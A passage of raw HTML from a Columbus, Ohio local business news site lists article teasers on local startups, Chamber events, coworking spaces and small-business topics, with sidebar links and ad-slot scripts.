content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Philanthropitch"><meta itemprop="datePublished" content="2019-02-06T08:00:39+00:00"><meta itemprop="headline " content="Innovation Meets Impact at Philanthropitch Columbus"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/02/Philanthropitch-provided1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chamber-annual-meeting-set-for-february-7/" rel="bookmark" title="Columbus Chamber Annual Meeting Set for February 7"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/01/ChamberAnnualMeeting-80x60.jpg" alt="" title="Columbus Chamber Annual Meeting Set for February 7"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chamber-annual-meeting-set-for-february-7/" rel="bookmark" title="Columbus Chamber Annual Meeting Set for February 7">Columbus Chamber Annual Meeting Set for February 7</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-01-21T09:00:04+00:00" >January 21, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-01-21T09:00:04+00:00"><meta itemprop="headline " content="Columbus Chamber Annual Meeting Set for February 7"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/01/ChamberAnnualMeeting.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chambers-leadership-small-business-series-anticipating-tomorrows-trends-business/" rel="bookmark" title="Columbus Chamber’s Leadership for Small Business Series: Anticipating Tomorrow’s Trends in Business"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/10/Chamber-Trends-80x60.jpg" alt="" title="Columbus Chamber’s Leadership for Small Business Series: Anticipating Tomorrow’s Trends in Business"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chambers-leadership-small-business-series-anticipating-tomorrows-trends-business/" rel="bookmark" title="Columbus Chamber’s Leadership for Small Business Series: Anticipating Tomorrow’s Trends in Business">Columbus Chamber’s Leadership for Small Business Series: Anticipating Tomorrow’s Trends in Business</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-10-15T17:03:14+00:00" >October 15, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-10-15T17:03:14+00:00"><meta itemprop="headline " content="Columbus Chamber’s Leadership for Small Business Series: Anticipating Tomorrow’s Trends in Business"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/10/Chamber-Trends.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div></div> <!-- ./block --></div></div></div><div class="vc_row wpb_row td-pb-row vc_custom_1456930194564"><div class="wpb_column vc_column_container td-pb-span12"><div class="wpb_wrapper"><div class="td-a-rec td-a-rec-id-custom_ad_2 "><!-- Async AdSlot 6 for Ad unit 'Metropreneur_BTF_LowerLeaderboard_Homepage' ### Size: [[320,50],[728,90]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[5]]) --> <div id='div-gpt-ad-8181961-6'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-6'); }); </script> </div> <!-- End AdSlot 6 --></div></div></div></div><div class="vc_row wpb_row td-pb-row"><div class="wpb_column vc_column_container td-pb-span8"><div class="wpb_wrapper"><script>var block_td_uid_12_5cdd84e97fb43 = new tdBlock(); block_td_uid_12_5cdd84e97fb43.id = "td_uid_12_5cdd84e97fb43"; block_td_uid_12_5cdd84e97fb43.atts = '{"custom_title":"Latest Articles","limit":"8","class":"td_uid_12_5cdd84e97fb43_rand"}'; block_td_uid_12_5cdd84e97fb43.td_column_number = "2"; block_td_uid_12_5cdd84e97fb43.block_type = "td_block_4"; block_td_uid_12_5cdd84e97fb43.post_count = "8"; block_td_uid_12_5cdd84e97fb43.found_posts = "2311"; block_td_uid_12_5cdd84e97fb43.header_color = ""; block_td_uid_12_5cdd84e97fb43.ajax_pagination_infinite_stop = ""; block_td_uid_12_5cdd84e97fb43.max_num_pages = "289"; tdBlocksArray.push(block_td_uid_12_5cdd84e97fb43); </script><div class="td_block_wrap td_block_4 td_uid_12_5cdd84e97fb43_rand td-pb-border-top"><h4 class="block-title"><span>Latest Articles</span></h4><div id=td_uid_12_5cdd84e97fb43 class="td_block_inner"> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019-324x160.jpg" alt="" title="Can You Keep a Secret?"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-keep-trade-secrets/" rel="bookmark" title="Can You Keep a Secret?">Can You Keep a Secret?</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/mark-vrla/">Mark Vrla</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-16T08:00:50+00:00" >May 16, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> Trade secrets and other confidential information play an important role in the operation of every business. A trade secret is business or... </div> <meta itemprop="author" content = "Mark Vrla"><meta itemprop="datePublished" content="2019-05-16T08:00:50+00:00"><meta itemprop="headline " content="Can You Keep a Secret?"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/BT-May2019.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP-324x160.jpg" alt="" title="COhatch The Pub Brings Coworking to Polaris"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris">COhatch The Pub Brings Coworking to Polaris</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-13T16:07:55+00:00" >May 13, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> From British bar to coworking space and social club. The transformation of The Pub at Polaris is complete as COhatch opens the... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-13T16:07:55+00:00"><meta itemprop="headline " content="COhatch The Pub Brings Coworking to Polaris"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19-324x160.jpg" alt="" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-dr-peter-edwards-on-savethecrew/" rel="bookmark" title="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew">Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-10T09:12:13+00:00" >May 10, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> The Columbus Chamber and&nbsp;Capital University have partnered to bring the first business-themed podcast to Columbus. During cbuzz, Columbus-based brand journalist Mikaela Hunt... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-10T09:12:13+00:00"><meta itemprop="headline " content="Columbus Chamber cbuzz: Dr. Peter Edwards on #SaveTheCrew"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Cbuzz-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19-324x160.jpg" alt="" title="Columbus Culture and its Influence on Retail"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-culture-and-its-influence-on-retail/" rel="bookmark" title="Columbus Culture and its Influence on Retail">Columbus Culture and its Influence on Retail</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/myrissa-stalter/">Myrissa Stalter</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-09T08:00:46+00:00" >May 9, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> It’s no secret that Columbus has become a hub for young professionals to establish their roots. With a booming job market and... </div> <meta itemprop="author" content = "Myrissa Stalter"><meta itemprop="datePublished" content="2019-05-09T08:00:46+00:00"><meta itemprop="headline " content="Columbus Culture and its Influence on Retail"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/ChamberConnection-May19.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-marigold-went-from-instagram-account-to-clintonville-storefront/" rel="bookmark" title="How Marigold Went from Instagram Account to Clintonville Storefront"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Marigold-Mfeature-324x160.jpg" alt="" title="How Marigold Went from Instagram Account to Clintonville Storefront"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-marigold-went-from-instagram-account-to-clintonville-storefront/" rel="bookmark" title="How Marigold Went from Instagram Account to Clintonville Storefront">How Marigold Went from Instagram Account to Clintonville Storefront</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-07T14:27:57+00:00" >May 7, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> It&#039;s clicks to bricks for one new Clintonville storefront. What started as a successful Instagram account is now a retail storefront as... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-07T14:27:57+00:00"><meta itemprop="headline " content="How Marigold Went from Instagram Account to Clintonville Storefront"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Marigold-Mfeature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/john-rush-on-the-evolving-social-enterprise-ecosystem-in-central-ohio/" rel="bookmark" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/John-Headshot-324x160.jpg" alt="" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/john-rush-on-the-evolving-social-enterprise-ecosystem-in-central-ohio/" rel="bookmark" title="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio">John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/brett-lawrence/">Brett Lawrence</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-03T10:27:34+00:00" >May 3, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> When John Rush began contemplating a move from Chicago to Columbus nearly a decade ago to launch what would become CleanTurn, he... </div> <meta itemprop="author" content = "Brett Lawrence"><meta itemprop="datePublished" content="2019-05-03T10:27:34+00:00"><meta itemprop="headline " content="John Rush on the Evolving Social Enterprise Ecosystem in Central Ohio"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/John-Headshot.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/traxler-printing-moves-to-larger-space-expands-capabilities/" rel="bookmark" title="Traxler Printing Moves to Larger Space, Expands Capabilities"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Traxler-Feature-324x160.jpg" alt="" title="Traxler Printing Moves to Larger Space, Expands Capabilities"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/traxler-printing-moves-to-larger-space-expands-capabilities/" rel="bookmark" title="Traxler Printing Moves to Larger Space, Expands Capabilities">Traxler Printing Moves to Larger Space, Expands Capabilities</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-02T15:01:37+00:00" >May 2, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> For the fifth time in nine years, Traxler Printing is on the move. The growing printing company is settling in at 3005... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-02T15:01:37+00:00"><meta itemprop="headline " content="Traxler Printing Moves to Larger Space, Expands Capabilities"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/Traxler-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --> <div class="td-block-span6"> <div class="td_module_2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/applications-open-for-2019-sea-change-accelerator/" rel="bookmark" title="Applications Open for 2019 SEA Change Accelerator"><img width="324" height="160" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/SEA2018-feature-324x160.jpg" alt="" title="Applications Open for 2019 SEA Change Accelerator"/></a></div> </div> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/applications-open-for-2019-sea-change-accelerator/" rel="bookmark" title="Applications Open for 2019 SEA Change Accelerator">Applications Open for 2019 SEA Change Accelerator</a></h3> <div class="td-module-meta-info"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-01T12:09:59+00:00" >May 1, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> <div class="td-excerpt"> Applications are now open for social enterprise accelerator SEA Change. Up to 15 businesses will be selected for the 14-week program that... </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-01T12:09:59+00:00"><meta itemprop="headline " content="Applications Open for 2019 SEA Change Accelerator"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/08/SEA2018-feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span6 --></div><!--./row-fluid--></div></div> <!-- ./block --></div></div><div class="wpb_column vc_column_container td-pb-span4"><div class="wpb_wrapper"><script>var block_td_uid_13_5cdd84e9834eb = new tdBlock(); block_td_uid_13_5cdd84e9834eb.id = "td_uid_13_5cdd84e9834eb"; block_td_uid_13_5cdd84e9834eb.atts = '{"custom_title":"Random Articles","sort":"random_posts","limit":"6","class":"td_uid_13_5cdd84e9834eb_rand"}'; block_td_uid_13_5cdd84e9834eb.td_column_number = "1"; block_td_uid_13_5cdd84e9834eb.block_type = "td_block_7"; block_td_uid_13_5cdd84e9834eb.post_count = "6"; block_td_uid_13_5cdd84e9834eb.found_posts = "2311"; block_td_uid_13_5cdd84e9834eb.header_color = ""; block_td_uid_13_5cdd84e9834eb.ajax_pagination_infinite_stop = ""; block_td_uid_13_5cdd84e9834eb.max_num_pages = "386"; tdBlocksArray.push(block_td_uid_13_5cdd84e9834eb); </script><div class="td_block_wrap td_block_7 td_uid_13_5cdd84e9834eb_rand td-pb-border-top"><h4 class="block-title"><span>Random Articles</span></h4><div id=td_uid_13_5cdd84e9834eb class="td_block_inner"> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/sechs-sells-college-students-introduce-malt-beverage-to-the-market/" rel="bookmark" title="Sech&#8217;s Sells, College Students Introduce Malt Beverage to the Market"><img width="70" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2016/02/Sechs280.png" alt="" title="Sech&#8217;s Sells, College Students Introduce Malt Beverage to the Market"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/sechs-sells-college-students-introduce-malt-beverage-to-the-market/" rel="bookmark" title="Sech&#8217;s Sells, College Students Introduce Malt Beverage to the Market">Sech&#8217;s Sells, College Students Introduce Malt Beverage to the Market</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-15T08:00:06+00:00" >February 15, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2016-02-15T08:00:06+00:00"><meta itemprop="headline " content="Sech&#039;s Sells, College Students Introduce Malt Beverage to the Market"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2016/02/Sechs280.png"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/letha-pugh-to-receive-reese-neader-memorial-award-for-entrepreneurship-and-social-change/" rel="bookmark" title="Letha Pugh to Receive Reese Neader Memorial Award for Entrepreneurship and Social Change"><img width="100" height="62" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2014/06/bake-me-happy.jpg" alt="" title="Letha Pugh to Receive Reese Neader Memorial Award for Entrepreneurship and Social Change"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/letha-pugh-to-receive-reese-neader-memorial-award-for-entrepreneurship-and-social-change/" rel="bookmark" title="Letha Pugh to Receive Reese Neader Memorial Award for Entrepreneurship and Social Change">Letha Pugh to Receive Reese Neader Memorial Award for Entrepreneurship and...</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-07-24T16:00:37+00:00" >July 24, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Anne Evans"><meta itemprop="datePublished" content="2017-07-24T16:00:37+00:00"><meta itemprop="headline " content="Letha Pugh to Receive Reese Neader Memorial Award for Entrepreneurship and Social Change"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2014/06/bake-me-happy.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/strategic-website-planning-part-1/" rel="bookmark" title="Strategic Website Planning: Part 1"><img width="70" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2013/08/buckeye-interactive-smaller1.jpg" alt="" title="Strategic Website Planning: Part 1"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/strategic-website-planning-part-1/" rel="bookmark" title="Strategic Website Planning: Part 1">Strategic Website Planning: Part 1</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2013-09-25T08:00:04+00:00" >September 25, 2013</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Brad Griffith"><meta itemprop="datePublished" content="2013-09-25T08:00:04+00:00"><meta itemprop="headline " content="Strategic Website Planning: Part 1"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2013/08/buckeye-interactive-smaller1.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-barry-chandler-of-storyforge/" rel="bookmark" title="Columbus Chamber cbuzz: Barry Chandler of Storyforge"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2016/07/cbuzzbarry2-100x70.jpg" alt="" title="Columbus Chamber cbuzz: Barry Chandler of Storyforge"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-barry-chandler-of-storyforge/" rel="bookmark" title="Columbus Chamber cbuzz: Barry Chandler of Storyforge">Columbus Chamber cbuzz: Barry Chandler of Storyforge</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-07-11T09:36:29+00:00" >July 11, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2016-07-11T09:36:29+00:00"><meta itemprop="headline " content="Columbus Chamber cbuzz: Barry Chandler of Storyforge"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2016/07/cbuzzbarry2.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/retail-design-basics-class-offered-ecdi-week/" rel="bookmark" title="Retail Design Basics class to be offered at ECDI next week"><img width="70" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2011/07/retail-design-feat.jpg" alt="" title="Retail Design Basics class to be offered at ECDI next week"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/retail-design-basics-class-offered-ecdi-week/" rel="bookmark" title="Retail Design Basics class to be offered at ECDI next week">Retail Design Basics class to be offered at ECDI next week</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2011-07-22T08:00:10+00:00" >July 22, 2011</time><meta itemprop="interactionCount" content="UserComments:1"/></div> </div> </div> <meta itemprop="author" content = "Melanie McIntyre"><meta itemprop="datePublished" content="2011-07-22T08:00:10+00:00"><meta itemprop="headline " content="Retail Design Basics class to be offered at ECDI next week"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2011/07/retail-design-feat.jpg"><meta itemprop="interactionCount" content="UserComments:1"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/city-council-creates-small-business-concierge-position/" rel="bookmark" title="City Council Creates Small Business Concierge Position"><img width="70" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2014/08/ryan-schick-square.jpg" alt="" title="City Council Creates Small Business Concierge Position"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/city-council-creates-small-business-concierge-position/" rel="bookmark" title="City Council Creates Small Business Concierge Position">City Council Creates Small Business Concierge Position</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2014-08-12T08:00:11+00:00" >August 12, 2014</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2014-08-12T08:00:11+00:00"><meta itemprop="headline " content="City Council Creates Small Business Concierge Position"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2014/08/ryan-schick-square.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="td-a-rec td-a-rec-id-custom_ad_4 "><!-- Async AdSlot 7 for Ad unit 'Metropreneur_BTF_LowerSquare_Homepage' ### Size: [[300,250]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[6]]) --> <div id='div-gpt-ad-8181961-7'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-7'); }); </script> </div> <!-- End AdSlot 7 --></div><div class="vc_wp_recentcomments wpb_content_element"><div class="widget widget_recent_comments"><h2 class="widgettitle">Recent Comments</h2><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Truth Teller</span> on <a href="https://themetropreneur.com/columbus/columbus-chamber-cbuzz-john-rush-of-clean-turn-enterprises/#comment-589">Columbus Chamber cbuzz: John Rush of CleanTurn Enterprises</a></li><li class="recentcomments"><span class="comment-author-link">sharda steel equipments</span> on <a href="https://themetropreneur.com/columbus/open-food-cart-food-truck/#comment-588">How to open a food cart or food truck</a></li><li class="recentcomments"><span class="comment-author-link">Aquiire_Inc</span> on <a href="https://themetropreneur.com/columbus/creative-advertising-agency-rave-celebrates-10-years/#comment-586">Creative Advertising Agency RAVE Celebrates 10 Years</a></li><li class="recentcomments"><span class="comment-author-link">Moving Ahead Service</span> on <a href="https://themetropreneur.com/columbus/is-flat-fee-the-future-of-real-estate/#comment-585">Is Flat Fee the Future of Real Estate?</a></li><li class="recentcomments"><span class="comment-author-link">Pete Prue</span> on <a href="https://themetropreneur.com/columbus/the-writing-is-on-the-wall-who-owns-rights-in-graffiti/#comment-584">The Writing is On the Wall – Who Owns Rights in Graffiti?</a></li></ul></div></div></div></div></div> </div> </div> <!-- /.td-main-content-wrap --> <!-- Footer --> <div class="td-footer-wrapper td-footer-template-4"> <div class="td-container"> <div 